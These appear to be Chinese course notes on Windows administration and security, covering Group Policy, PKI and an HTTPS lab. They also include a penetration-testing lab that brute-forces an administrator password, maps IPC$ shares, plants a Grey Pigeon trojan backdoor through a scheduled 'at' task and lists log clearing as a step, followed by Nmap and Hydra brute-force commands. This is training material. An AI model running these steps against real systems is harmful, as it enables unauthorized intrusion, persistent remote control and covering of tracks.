组织继承:上级所有的OU对我没有任何影响,使用的是自己独有的策略

注意:强制是对组策略右键进行设置,组织继承是对OU右键进行设置

**********正常情况下:LSDOU顺序

上级OU: 桌面:aa 、运行:删除

下级OU: 桌面:未配置 、运行:不删除

下级OU用户结果:桌面:aa、 运行:不删除

*********下级OU设置了组织继承:

下级OU用户结果:桌面:未配置、 运行:不删除

××××××上级设置了强制:

下级OU用户结果:桌面:aa、 运行:删除

注意:当上级强制和下级阻止继承同时设置,强制生效!

查看当前组策略都设置了那些策略:

14.11、添加其他策略

选中相应的组策略表---右键编辑

(1)添加脚本组策略

(2)去除Ctrl+Alt+Del键

(3)添加密码策略

14.12、综合小实验

实验注意事项:

1、DC部署完毕之后,需要将DNS修改为如下状态

2、使用域账号登录2003服务器,部署DHCP时,需要右键授权

3、部署WEB时,如果是动态网站记得启用父路径,并允许动态网站插件安装

4、网站搭建好之后,需要域名的解析服务,要将此域名要加入到DNS服务器中

5、在win7客户机登录网站时,刷新一下dns缓存 ipconfig /flushdns

十五、渗透测试简单流程

15.1、渗透简单流程

0.授权

1.信息收集

nslookup、whois

2.扫描漏洞

namp=ip 范围 端口 80(IIS,apache,什么网站)scanport

高级扫描:如IIS漏洞2003-IIS6.0、 2008-IIS7.0

扫描网站漏洞

3.漏洞利用

4.提权(shell环境、桌面环境、最高权限)

5.毁尸灭迹(清除日志)

6.留后门

7.渗透测试报告

15.2、手工测试端口号开放

telnet IP地址 测试端口

15.3、渗透测试实验

已知2003服务器的用户名为administrator,要求渗透此服务器

15.3.1、scanport扫描445端口

由图可知188.188.188.2的445端口开放

15.3.2、进行暴力破解:NTscan

 

可知暴力破解的密码为:root

15.3.3、漏洞利用之IPC$

net use f: \\10.1.1.2\c$ 密码 /user:用户
net use f: \\10.1.1.2\share 密码 /user:用户
net use \\10.1.1.2\ipc$ 密码 /user:用户   #IPC$的写法
net use f: /del
net use * /del

ipc$只有共享名,没有物理路径,所以也称为空链接。建立成功之后可以通过过命令行对整个服务器进行操作,命令行中需要写网络路径

注意:开机重启之后这条net use就会显示不可用状态,需要重新建立连接,如果设置映射后,下次重启之后也是可用的

我的电脑---右键---映射网络驱动器

15.3.4、制作木马

利用光盘上的灰鸽子软件

 

15.3.5、植入木马(留后门)

将木马文件copy到服务器中

15.3.6、设置计划任务自动执行木马

net time \\188.188.188.2  #查看188.188.188.2的时间
at \\188.188.188.2 12:45 "c:\xx.exe" #让188.188.188.2在12:45执行xx.exe文件
at \\188.188.188.2  #查看188.188.188.2所有的定时计划
at #查看本机所有的定时计划

设置定时计划

15.3.7、等待肉鸡上线

 

十六、PKI

16.1、PKI概述

名称:Public Key Infrastructure 公钥基础设施

作用:通过加密技术和数字签名保证信息的安全

组成:公钥加密技术、数字证书、CA、RA

16.2、信息安全三要素

机密性、完整性、身份验证/操作的不可否认性

16.3、哪些IT领域用到PKI

1)SSL/HTTPS

2)IPsecVPN

3)部分远程访问VPN

16.4、公钥加密技术

作用:实现对信息加密、数字签名等安全保障

加密算法:

(1)对称加密算法

x+5=y(对称加密算法)

x是原数据/原文、y是密文、5是key/密钥

加解密的密钥一致,如果密钥丢失则非常危险。

DES 3DES AES

(2)非对称加密算法(公钥加密,私钥解开 / 私钥加密,公钥解开)

① 通信双方各自产生一对公私钥

② 双方各自交换公钥

③ 公钥和私钥为互相加解密关系

④ 公私钥不可互相逆推

RSA DH

HASH算法:MD5 SHA (验证完整性)

HASH值可逆么?不可逆! 

HASH值=摘要

数字签名:用自己的私钥对摘要加密得出的密文就是数字签名

16.5、证书

证书用于保证公密的合法性

证书格式遵循X.509标准

数字证书包含信息:

1.使用者的公钥值

2.使用者标识信息(如名称和电子邮件地址)

3.有效期(证书的有效时间)

4.颁发者标识信息

5.颁发者的数字签名

数字证书由权威公正的第三方机构即CA签发,CA是权威证书颁发机构,为了公正“公钥”的合法性!

机密性:使用对方的公钥加密

身份验证/数字签名:使用自己的私钥加密

验证CA过程:

16.6、实验名称:部署HTTPS服务器/部署SSL服务器

实验环境:

1、win2008作为https服务器:188.188.188.1/24

2、win7作为客户机:188.188.188.2/24

3、桥接到虚拟网络vmenet2

实验步骤:

1、将2008与win7调节到同意VMnet下,配置IP

win2008:188.188.188.1 (2008的dns需要手动指向自己127.0.0.1)

win7:188.188.188.2(win7的dns需要手动指向188.188.188.1)

2、win2008下 我的电脑---右键管理---角色---添加角色---勾选web服务器(IIS)---勾选应用程序开发---完成安装

3、打开安装好的IIS---新建网站(不能删除Default Web Site)---修改默认页面

安装CA时,CA自带了一套网络站点,此CA站点就会自动征用Default Web Site站点路径

4、win2008下 安装DNS,我的电脑---右键管理---角色---添加角色---勾选DNS服务器---完成安装---打开DNS---新建区域---新建主机名

5、win2008下 安装CA,我的电脑---右键管理---角色---添加角色---勾选Active Directory 证书服务---勾选证书颁发机构Web注册---添加所需角色服务---安装完成

6、打开IIS---选中服务器名---创建证书申请---填写信息---生成证书申请文件---完成

7、我的电脑---管理---服务器管理---安全信息---配置IE ESC---全部禁用---完成

8、IE---188.188.188.1/certsrv---申请证书---高级证书申请---使用base64编码---复制生成证书申请文件的内容---提交

web浏览器证书:不是给服务器申请的,是给员工申请的,IIS提供服务,IIS需要下载证书,确保用户可以信任IIS

有一种网站用户相信IIS还不行,IIS还要验证用户是不是真正的用户,这个时候用户也需要去申请证书,也就是web浏览器证书

 

9、管理工具---证书颁发机构---挂起的申请---右键---所有任务---颁发

10、IE---188.188.188.1/certsrv---查看挂起的证书申请的状态---保存的申请证书---下载证书

证书链:A信任B,B信任C,这叫证书链

11、打开IIS---选中服务器名---完成证书申请---导入刚下载的证书

12、选中创建的网站右键---编辑绑定---添加---类型https、选择证书---确定

 

12、选中创建的网站---SSL设置---勾选要求SSL---应用

如果这里的SSL中客户证书设置为必需(R)的话,那就意味着客户机也需要访问188.188.188.1\certsrv进行web浏览器证书申请,申请成功之后安装即可

如果浏览器弹出此网站CA不可信的时候,那么先在188.188.188.1\certsrv中将CA机构的证书下载下来,导入到受信任的根证书颁发机构中即可

十七、扫描与爆破

17.1、主机探测与端口扫描

主机测探是指确定目标主机是否存活。

端口扫描就是寻找在线主机所开放的端口,并且在端口上所运行的服务。甚至可以进一步确定目标主机操作系统类型和更详细的信息

常见端口号

17.2、Nmap-扫描器之王

重要常用参数
-sP    #ping 扫描
-p    #指定端口范围
-sV    #服务版本探测
-O(大写)    #启用操作系统探测
-A    #全面扫描
-oN    #保存txt
Nmap -sP 10.1.1.1/24  #扫描10.1.1.0整个网段哪些设备在线
Nmap -p 21,23-25,3389 10.1.1.1  #扫描10.1.1.1的21、23、24、25、3389端口的状态
Nmap -p 21,23-25,3389 10.1.1.1/24   #扫描10.1.1.0整个网段所有在线设备的21、23、24、25、3389端口的开放状态
Nmap -p 21,23 10.1.1.1 -sV   #扫描21,23的服务版本
Nmap -A 10.1.1.1   #全面扫描
Nmap -O 10.1.1.1  #扫描目标系统版本
Nmap -p 21,23 10.1.1.1 -oN E:\result.txt  #扫描10.1.1.1的21、23端口的状态,并将结果保存到E:\result.txt

17.3、Hydra九头蛇

暴力破解密码工具

#小写字母表示固定内容,大写字母表示去密码字典遍历内容
Hydra -l a -p 123 10.1.1.1 telnet #爆破10.1.1.1的telnet端口,账号为a,密码为123
Hydra -l a -P e:\pass.txt  10.1.1.1 telnet #爆破10.1.1.1的telnet端口,账号为a,密码字典为e:\pass.txt
Hydra -l a -P e:\pass.txt  10.1.1.1 rdp
Hydra -l a -P e:\pass.txt  10.1.1.1 smb
Hydra -l a -P e:\pass.txt  10.1.1.1 ftp
Hydra -l a -P e:\pass.txt  10.1.1.1 ssh
Hydra -l a -P e:\pass.txt  10.1.1.1 mysql
Hydra
-L e:\user.txt -P e:\pass.txt 10.1.1.1 telnet

#爆破10.1.1.1的telnet端口,账号字典为e:\user.txt,密码字典为e:\pass.txt

17.4、本地破解Getpass

Getpass是从在用户输入密码之后,从内存中提取密码,win7有此漏洞,win10已经补上了

推荐阅读